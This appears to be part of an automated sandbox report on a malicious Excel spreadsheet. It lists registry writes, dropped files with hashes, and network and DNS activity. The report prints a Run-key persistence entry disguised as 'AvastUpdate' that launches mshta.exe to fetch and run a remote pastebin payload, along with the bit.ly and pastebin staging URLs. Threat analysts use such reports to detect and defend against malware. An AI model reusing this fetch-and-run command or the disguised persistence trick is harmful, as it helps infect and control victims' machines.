00000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000
3432
EXCEL.EXE
write
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Excel\Resiliency\DocumentRecovery\16A118
16A118
04000000680D00003700000043003A005C00550073006500720073005C00610064006D0069006E005C004400650073006B0074006F0070005C00530070006500630069006600690063006100740069006F006E0073005F005F005F0039003900320037003200360035002E0078006C0074002E0078006C007300000000001700000043003A005C00550073006500720073005C00610064006D0069006E005C004400650073006B0074006F0070005C000100000000000000B00520DE8468D50118A1160018A1160000000000AC020000001800000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000
3432
EXCEL.EXE
write
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Installer\UserData\S-1-5-18\Products\00004109D30000000000000000F01FEC\Usage
EXCELFiles
1328218135
3432
EXCEL.EXE
write
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Installer\UserData\S-1-5-18\Products\00004109D30000000000000000F01FEC\Usage
ProductFiles
1328218256
3432
EXCEL.EXE
write
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Installer\UserData\S-1-5-18\Products\00004109D30000000000000000F01FEC\Usage
VBAFiles
1328218116
3432
EXCEL.EXE
write
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\ReviewCycle
ReviewToken
{B4C8A4DF-1768-4277-9775-AE7CA8393372}
3432
EXCEL.EXE
write
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Excel\Resiliency\DocumentRecovery\16A118
16A118
04000000680D00003700000043003A005C00550073006500720073005C00610064006D0069006E005C004400650073006B0074006F0070005C00530070006500630069006600690063006100740069006F006E0073005F005F005F0039003900320037003200360035002E0078006C0074002E0078006C007300000000001700000043003A005C00550073006500720073005C00610064006D0069006E005C004400650073006B0074006F0070005C000100000000000000B00520DE8468D50118A1160018A1160000000000AC020000001800000400000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000
3432
EXCEL.EXE
write
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Excel\Place MRU
Max Display
25
3432
EXCEL.EXE
write
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Excel\Place MRU
Item 1
[F00000000][T01D56884DE593E20][O00000000]*C:\Users\admin\Desktop\
3432
EXCEL.EXE
write
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Excel\File MRU
Max Display
25
3432
EXCEL.EXE
write
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Excel\File MRU
Item 1
[F00000000][T01D56884DE593E20][O00000000]*C:\Users\admin\Desktop\Specifications___9927265.xlt.xls
3432
EXCEL.EXE
write
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\Licensing
538F6C892AD540068154C6670774E980
01000000270000007B39303134303030302D303033442D303030302D303030302D3030303030303046463143457D005A0000004F00660066006900630065002000310034002C0020004F0066006600690063006500500072006F00660065007300730069006F006E0061006C002D00520065007400610069006C002000650064006900740069006F006E000000
2608
mshta.exe
write
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap
UNCAsIntranet
0
2608
mshta.exe
write
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap
AutoDetect
1
2608
mshta.exe
write
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings
ProxyEnable
0
2608
mshta.exe
write
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Connections
SavedLegacySettings
4600000092000000010000000000000000000000000000000000000000000000C0E333BBEAB1D301000000000000000000000000020000001700000000000000FE800000000000007D6CB050D9C573F70B000000000000006D00330032005C004D00530049004D004700330032002E0064006C000100000004AA400014AA4000040000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000002000000C0A8016400000000000000000000000000000000000000000800000000000000805D3F00983740000008000002000000000000600000002060040000B8A94000020000008802000060040000B8A9400004000000F8010000B284000088B64000B84B400043003A000000000000000000000000000000000000000000
2608
mshta.exe
write
HKEY_CLASSES_ROOT\Local Settings\MuiCache\72\52C64B7E
LanguageList
en-US
3924
mshta.exe
write
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap
UNCAsIntranet
0
3924
mshta.exe
write
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap
AutoDetect
1
3924
mshta.exe
write
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings
ProxyEnable
0
3924
mshta.exe
write
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Connections
SavedLegacySettings
4600000093000000010000000000000000000000000000000000000000000000C0E333BBEAB1D301000000000000000000000000020000001700000000000000FE800000000000007D6CB050D9C573F70B000000000000006D00330032005C004D00530049004D004700330032002E0064006C000100000004AA400014AA4000040000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000002000000C0A8016400000000000000000000000000000000000000000800000000000000805D3F00983740000008000002000000000000600000002060040000B8A94000020000008802000060040000B8A9400004000000F8010000B284000088B64000B84B400043003A000000000000000000000000000000000000000000
3924
mshta.exe
write
HKEY_CLASSES_ROOT\Local Settings\MuiCache\72\52C64B7E
LanguageList
en-US
3924
mshta.exe
write
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run
AvastUpdate
mshta.exe http://pastebin.com/raw/y0qQd9ts

Files activity

Executable files
0
Suspicious files
1
Text files
15
Unknown types
3

Dropped files

PID
Process
Filename
Type
3432
EXCEL.EXE
C:\Users\admin\AppData\Local\Temp\~DFACE0084D7BA3C322.TMP
––
MD5:  ––
SHA256:  ––
2608
mshta.exe
C:\Users\admin\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\H6QNMHE9\cookienotice[1].js
text
MD5: a705132a2174f88e196ec3610d68faa8
SHA256: 068ffe90977f2b5b2dc2ef18572166e85281bd0ecb31c4902464b23db54d2568
3924
mshta.exe
C:\Users\admin\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\JGRR2OYX\eS9WmF3u[1].txt
html
MD5: 1a478ef6760497637e3834a364a94594
SHA256: 342d150994457fb0336d9f8e52fd3d2e52496884f2070d88607f4f930c681d80
3924
mshta.exe
C:\Users\admin\AppData\Roaming\Microsoft\Windows\Cookies\[email protected][1].txt
text
MD5: fafa88fb58b08f87868679a99ad23854
SHA256: d5509165bb61a645431a5814e8e6cabdcf38ea9b9bf430de2479ed5e23d7dbaf
2608
mshta.exe
C:\Users\admin\AppData\Roaming\Microsoft\Windows\IETldCache\index.dat
dat
MD5: d7a950fefd60dbaa01df2d85fefb3862
SHA256: 75d0b1743f61b76a35b1fedd32378837805de58d79fa950cb6e8164bfa72073a
2608
mshta.exe
C:\Users\admin\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\I0488CJO\cb=gapi[1].loaded_1
text
MD5: 0f01ef9e90b667d2c91739b20ed396db
SHA256: 18a2599cdc0092aba65c6ede47fa89e474c3a8a1a0df3478f90f35336d46cb0a
2608
mshta.exe
C:\Users\admin\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\I0488CJO\error[1]
html
MD5: 16aa7c3bebf9c1b84c9ee07666e3207f
SHA256: 7990e703ae060c241eba6257d963af2ecf9c6f3fbdb57264c1d48dda8171e754
2608
mshta.exe
C:\Users\admin\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\I0488CJO\3704929657-widgets[1].js
––
MD5:  ––
SHA256:  ––
2608
mshta.exe
C:\Users\admin\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\H6QNMHE9\cb=gapi[1].loaded_0
text
MD5: 9592a9ddf920739fad11ecb40e312905
SHA256: aef6eeb769cc25d6f1776c5f7e97aef03258c9b5362d72f0d7955633eadf8f09
2608
mshta.exe
C:\Users\admin\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\H6QNMHE9\1646370754-comment_from_post_iframe[1].js
html
MD5: 9ee08ad2448d931c3350f8efb31b9583
SHA256: 045a89da56e925603d6ae87bd25c68a06487b706cb75cd41138614995118d32e
3432
EXCEL.EXE
C:\Users\admin\AppData\Local\Temp\~DF6E80A16E8D286C76.TMP
document
MD5: a7f00482a47f2c5aec5584f1e4e5b8e7
SHA256: 01990b9ab6d509fc68c349f9aefbc30f27c7a81df41fbb6c3463db5dd7e3c56a
2608
mshta.exe
C:\Users\admin\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\H6QNMHE9\authorization[1].css
––
MD5:  ––
SHA256:  ––
2608
mshta.exe
C:\Users\admin\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\LH043OAM\plusone[1].js
html
MD5: 632e7fd3ca61fef2dd2b7a9f847e5f34
SHA256: d996e8927ae45383450bd8314f8bc89259a528aaa698231fe91d2295872d0496
2608
mshta.exe
C:\Users\admin\AppData\Roaming\Microsoft\Windows\Cookies\[email protected][1].txt
text
MD5: 4ac762d2869f8818373025fd4f20596b
SHA256: 54f5e7da083c46ede6476d3278ac05c65153d79244ba2935cb082177d9dd4341
2608
mshta.exe
C:\Users\admin\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\JGRR2OYX\95993233-ieretrofit[1].js
html
MD5: 43ad0c19dd69995d18b1824c047a45a5
SHA256: ed723ad81c8add8d98d9aeda58da6cb9df591df8a8c1712601a2932130db783f
2608
mshta.exe
C:\Users\admin\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\I0488CJO\3597120983-css_bundle_v2[1].css
text
MD5: ac004ad1eafc60b54fed8371c9c33fbc
SHA256: 869176cab64c36f92c6c1f8ffbe85919575d6b9995a54850e5925289f3a75078
2608
mshta.exe
C:\Users\admin\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\LH043OAM\2ky-day-one[1].html
html
MD5: 2490060c82f7c12b9cbeff1c02679ee4
SHA256: 52a340a99c03391601daa9f5636039bfbb48078b84b964daa1013c35bf7d4c0d
2608
mshta.exe
C:\Users\admin\AppData\Roaming\Microsoft\Windows\Cookies\[email protected][1].txt
text
MD5: 8cc6c15fab6090b61a306071eb94f853
SHA256: 66776fcb72a251decfb40ab3ac30b48b9cccbb5e02ed2dfda8cf1dd8d2e7bf9f
3432
EXCEL.EXE
C:\Users\admin\AppData\Roaming\Microsoft\Office\Recent\Specifications___9927265.xlt.xls.LNK
lnk
MD5: 913832e4f55c299b032fbf83bc5ea920
SHA256: fcc9648cfabf4d4a9a62ba1180622c6770ca26be1829304f17d5b1b7b31cc171
3432
EXCEL.EXE
C:\Users\admin\AppData\Roaming\Microsoft\Office\Recent\index.dat
text
MD5: ae1e1ba0c3a3d2a9a857992938066f2e
SHA256: fe401f4549f8c72dd09b71ccba3b3dc7558c92309d403c711eb76f1427578ae9
3432
EXCEL.EXE
C:\Users\admin\AppData\Local\Temp\CVR9ADD.tmp.cvr
––
MD5:  ––
SHA256:  ––

Find more information of the staic content and download it at the full report

Network activity

HTTP(S) requests
2
TCP/UDP connections
12
DNS requests
10
Threats
2

HTTP requests

PID Process Method HTTP Code IP URL CN Type Size Reputation
2608 mshta.exe GET 301 67.199.248.11:80 http://bit.ly/mylunlenahaiakslagaaki US
html
shared
3924 mshta.exe GET 301 104.20.209.21:80 http://www.pastebin.com/raw/eS9WmF3u US
html
shared

Download PCAP, analyze network streams, HTTP content and a lot more at the full report

Connections

PID Process IP ASN CN Reputation
2608 mshta.exe 67.199.248.11:80 Bitly Inc US shared
2608 mshta.exe 172.217.23.161:443 Google Inc. US whitelisted
2608 mshta.exe 172.217.16.169:443 Google Inc. US whitelisted
2608 mshta.exe 216.58.205.238:443 Google Inc. US whitelisted
2608 mshta.exe 216.58.207.34:443 Google Inc. US whitelisted
2608 mshta.exe 172.217.22.45:443 Google Inc. US whitelisted
3924 mshta.exe 104.20.209.21:80 Cloudflare Inc US shared
3924 mshta.exe 104.20.208.21:443 Cloudflare Inc US shared

DNS requests

Domain IP Reputation
bit.ly 67.199.248.11
67.199.248.10
shared
myownteammana.blogspot.com 172.217.23.161
whitelisted
www.blogger.com 172.217.16.169
shared
apis.google.com 216.58.205.238
whitelisted
pagead2.googlesyndication.com 216.58.207.34
whitelisted
resources.blogblog.com 172.217.16.169
unknown
accounts.google.com 172.217.22.45
shared
www.pastebin.com 104.20.209.21
104.20.208.21
shared
pastebin.com 104.20.208.21
104.20.209.21
shared

Threats

PID Process Class Message
2608 mshta.exe Misc activity SUSPICIOUS [PTsecurity] Cmd.Powershell.Download HTTP UserAgent (Win7)
3924 mshta.exe Misc activity SUSPICIOUS [PTsecurity] Cmd.Powershell.Download HTTP UserAgent (Win7)

Debug output strings

No debug info.